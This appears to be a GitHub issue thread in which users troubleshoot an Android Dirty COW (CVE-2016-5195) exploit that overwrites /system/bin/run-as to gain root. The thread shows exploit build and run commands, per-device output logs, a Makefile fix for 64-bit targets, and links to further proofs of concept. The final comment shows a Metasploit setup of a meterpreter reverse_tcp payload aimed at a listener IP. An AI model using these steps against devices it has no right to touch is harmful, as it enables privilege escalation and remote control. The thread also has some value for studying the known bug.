Exploit not working

[forced-request]

Hello, I've been trying to get this to work and am running into the following. It looks like it's not properly swapping out the run-as command, despite saying exploited

$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
[100%] /data/local/tmp/dirtycow
adb push libs/armeabi/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
warning: new file size (13776) and file old size (14192) differ

size 14192

[*] mmap 0xf70b1000
[*] exploit (patch)
[*] currently 0xf70b1000=464c457f
[*] madvise = 0xf70b1000 14192
[*] madvise = 0 1048576
[*] /proc/self/mem -1048576 1048576
[*] exploited 0xf70b1000=464c457f
adb shell /system/bin/run-as
run-as: Usage:
    run-as <package-name> [--user <uid>] <command> [<args>]

[timwr]

@forced-request which device is this? I've found two devices so far where it doesn't work. One is a HTC Desire HD. The other is a friends Nexus 5X (apparently the Nexus 6P too, ping @rhcp011235 ?). For every other device it works very quickly (e.g the LOOP value can be as low as 1000).

[forced-request]

This is an HTC Nexus 9 running Marshmallow.

[timwr]

Ping @dirtycow

 _________________________________________
/ Linux version 2.6.35.10-g931a37e        \
| (htc-kernel@and18-2) (gcc version 4.4.0 |
| (GCC) ) #1 PREEMPT Wed Nov 9 14:04:03   |
\ CST 2011                                /
 -----------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

[rhcp011235]

Working fine on my nexus6P running 7.1.1 but we are not getting a shell yet :) @Jcase said its not hard we just need to kill SeLinux

[ghost]

Works on Blu R1 HD... Run-as is not actually escalating anything... Just saying it did for test. I want to know what can be changed to get root access. As thia devices is unrootable and unlockable as ota 6.6 and hate amazon prime offers lol

[rhcp011235]

@dirycow here to help us 👍🔥

[dirtycow]

Mooo

[rhcp011235]

Here is a list of current POC code:

https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

Hope this helps maybe

[parkerpeng]

parker@ubuntu:~/workspace/CVE-2016-5195$ adb shell /system/bin/run-as running as uid 2000 setresgid/setresuid failed uid 2000

write succeed but setresgid/setresuid failed

[parkerpeng]

adb shell /system/bin/run-as running as uid 2000 Could not set capabilities: Operation not permitted setresgid/setresuid failed uid 2000

[Trudence]

Same problem here, nexus 6P. Maybe the problem is related to this line: [*] /proc/self/mem -1048576 1048576

Any ideas?

[MaxChinni]

I can confirm that the exploit does not work on a Nexus 5X with the (at the moment) latest build (NBD90W).

[timwr]

I've tried the ptrace version of this exploit on my one non-vulnerable device (HTC Desire HD) and it's still unaffected. I'm not sure why as the kernel should be. @Trudence the 6P is vulnerable, this poc does not install su or disable SELinux. @MaxChinni I borrowed a 5X could not get the exploit to work. Perhaps you can try the ptrace version at https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs (although I suspect it won't be vulnerable either), I have no idea why. Any guesses?

[Jtillburn]

Thanks for posting the PoCs above. Should the procedure for executing these be similar to how dirtycow was executed?

[MaxChinni]

@timwr tried https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c, but the device hard reboots.

Does the code write(fd, p, mem_arg->patch_size) is expected to return -1 as pointed by @Trudence ? errno translates it to I/O error.

[noproto]

Same here, Linux localhost 3.10.61-8865969 #1 SMP PREEMPT Fri Jul 29 22:37:31 KST 2016 aarch64. (Galaxy S6)

[bkerler]

Poc tested on several android 4.4 (LG L70, SGS S4) and android 7.0 (Nexus 5). Gets till exploited message, then kills adb connection. run-as uid running as 2000, not as uid 0. Maybe run-as isn't the best target to go after.

[MaxChinni]

OK, solved on the Nexus 5X. The device has a 64-bit architecture, so we need to use the arm64-v8a variant of the compiled binaries.

In my case

diff --git a/Makefile b/Makefile
index 19e09b8..1dd61c3 100644
--- a/Makefile
+++ b/Makefile
@@ -5,8 +5,8 @@ build:
    ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21

 push: build
-       adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
-       adb push libs/armeabi/run-as /data/local/tmp/run-as
+       adb push libs/arm64-v8a/dirtycow /data/local/tmp/dirtycow
+       adb push libs/arm64-v8a/run-as /data/local/tmp/run-as

 root: push
    adb shell 'chmod 777 /data/local/tmp/run-as'

A good way to get device's abi could be

$ adb shell 'getprop ro.product.cpu.abilist'
arm64-v8a,armeabi-v7a,armeabi

[lucasa831]

got the same as op here

[Trudence]

Yes, solved it for me too

[Chrisplus]

Not working on Samsung galaxy nexus either (using armeabi-v7a and armeabi )

Processor : ARMv7 Processor rev 10 (v7l) processor : 0 BogoMIPS : 597.12

[MaxChinni]

@Chrisplus I tried on a Galaxy Nexus and I experience the same behaviour: it fails.

The ABI should be armeabi-v7a

$ adb shell getprop ro.product.cpu.abi
armeabi-v7a

Here's my output:

adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
warning: new file size (13784) and file old size (9500) differ

size 13784

[*] mmap 0x40204000
[*] exploit (patch)
[*] currently 0x40204000=464c457f
[*] madvise = 0x40204000 13784
[*] /proc/self/mem -1048576 1048576
[*] madvise = 0 1048576
[*] exploited 0x40204000=464c457f
adb shell /system/bin/run-as
Usage: run-as <package-name> <command> [<args>]

I suspect the problem is still related to

[*] /proc/self/mem -1048576 1048576

[ghost]

result on Alcatel One Touch Pop S3 (5050X):

Could not set capabilities: Operation not permitted setresgid/setresuid failed

[BsnNick]

@pnebert Same error on my Verizon SnapDragon Galaxy S7 Edge.

[leoforney]

Same issue on an unidentified LG Prepaid phone with armv7 rev 1

[basti-schr]

Now I get this message:

[] mmap 0x7fa69e1000 [] exploit (patch) [] currently 0x7fa69e1000=10102464c457f [] madvise = 0x7fa69e1000 13864 [] madvise = 0 1048576 [] /proc/self/mem 1652555776 1048576 [*] exploited 0x7fa69e1000=10102464c457f adb shell /system/bin/run-as

WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffffe arg 0x6f0
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6fffffff arg 0x1

running as uid 2000 uid 0

what is it?

[rootbdfy]

WARNING: linker: run-as: unused DT entry: type 0x6ffffffe arg 0x690
WARNING: linker: run-as: unused DT entry: type 0x6fffffff arg 0x1

Same problem on meizu m2 note (arm64-v8a)

[timwr]

You can safely ignore those warnings, or remove them with this: https://github.com/kost/android-elf-cleaner

[basti-schr]

Reboot your phone! This was the solution working for me.. :smile: @rootbdfy @timwr

[refi64]

@basti-schr But that just un-does the exploit...

[basti-schr]

OK, that is good to know. Because my problem is that I have a 64bit device and the elf-cleaner does not work with it. shell@phone:/data/local/tmp $ ./android-elf-cleaner /system/bin/sh: ./android-elf-cleaner: not executable: 64-bit ELF file

[rootbdfy]

@timwr @basti-schr android-elf-cleaner worked for me, but run-as still not work :

shell@m2note:/data/local/tmp $/dirtycow /system/bin/run-as run-as                                           <
warning: new file size (5816) and file old size (13864) differ

size 13864

[*] mmap 0x7f9f239000
[*] exploit (patch)
[*] currently 0x7f9f239000=10102464c457f
[*] madvise = 0x7f9f239000 13864
[*] madvise = 0 1048576
[*] /proc/self/mem 1652555776 1048576
[*] exploited 0x7f9f239000=10102464c457f

shell@m2note:/data/local/tmp $ run-as                                          
running as uid 2000
uid 0
shell@m2note:/data/local/tmp $ run-as su                                       
running as uid 2000
uid 0
shell@m2note:/data/local/tmp $ run-as blabla
running as uid 2000
uid 0
shell@m2note:/data/local/tmp $ run-as blabla blablabla                            
running as uid 2000
uid 0

[GurdZain]

adb shell /system/bin/run-as running as uid 2000 uid 2000

I have replaced the run-as.. Does uid 2000 mean failure?

@timwr

[droidvoider]

Anyone find a solution for this problem yet? 2|shell@noblelteatt:/system/bin $ run-as run-as uid run-as 2000 setresgid/setresuid failed uid 2000 0 u:r:runas:s0 context 0 u:r:shell:s0 shell@noblelteatt:/system/bin

timwr thank you so much for your contributions you are off the hook amazing! I learned so much from this already

[abassolhy]

My problem is msf > use exploit/android/fileformat/adobe_reader_pdf_js_interface msf exploit(adobe_reader_pdf_js_interface) > set -p android/meterpreter/reverse_tcp -p => android/meterpreter/reverse_tcp msf exploit(adobe_reader_pdf_js_interface) > set lhost 100.77.94.142 lhost => 100.77.94.142 msf exploit(adobe_reader_pdf_js_interface) > set lport 4444lport => 4444 msf exploit(adobe_reader_pdf_js_interface) > exploit

[*] Generating Javascript exploit... ([-] Exploit failed: RuntimeError android/libs/armeabi/libndkstager.so not found)

[abassolhy]

What problem? Exploit failed: RuntimeError android/libs/armeabi/libndkstager.so not found